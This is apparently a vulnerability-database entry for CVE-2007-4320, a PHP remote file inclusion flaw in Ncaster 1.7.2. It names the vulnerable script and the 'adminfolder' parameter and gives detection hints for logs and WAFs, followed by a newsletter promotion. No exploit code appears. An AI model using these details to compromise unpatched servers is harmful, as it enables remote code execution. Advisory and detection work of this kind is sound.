cbcvebase.
CVE-2007-4320
published 2007-08-14

CVE-2007-4320: PHP remote file inclusion vulnerability in admin/addons/archive/archive.php in Ncaster 1.7.2 allows remote attackers to execute arbitrary PHP code via a URL in…

PriorityP258high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
72.02%
99.4th percentile
PHP remote file inclusion vulnerability in admin/addons/archive/archive.php in Ncaster 1.7.2 allows remote attackers to execute arbitrary PHP code via a URL in the adminfolder parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
ncasterncaster

Detection & IOCsextracted from sources · hover to see the quote

pathadmin/addons/archive/archive.php
  • Remote File Inclusion via the 'adminfolder' GET parameter in archive.php; monitor HTTP requests containing a URL (http/https) in the adminfolder parameter targeting admin/addons/archive/archive.php
  • The vulnerable code passes the adminfolder parameter directly into a require() call; look for require() of a remote URL pattern in PHP logs or WAF alerts on this endpoint
  • ·Exploitation requires PHP's allow_url_include (and allow_url_fopen) to be enabled on the target server; environments with these directives disabled are not exploitable via this RFI vector
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.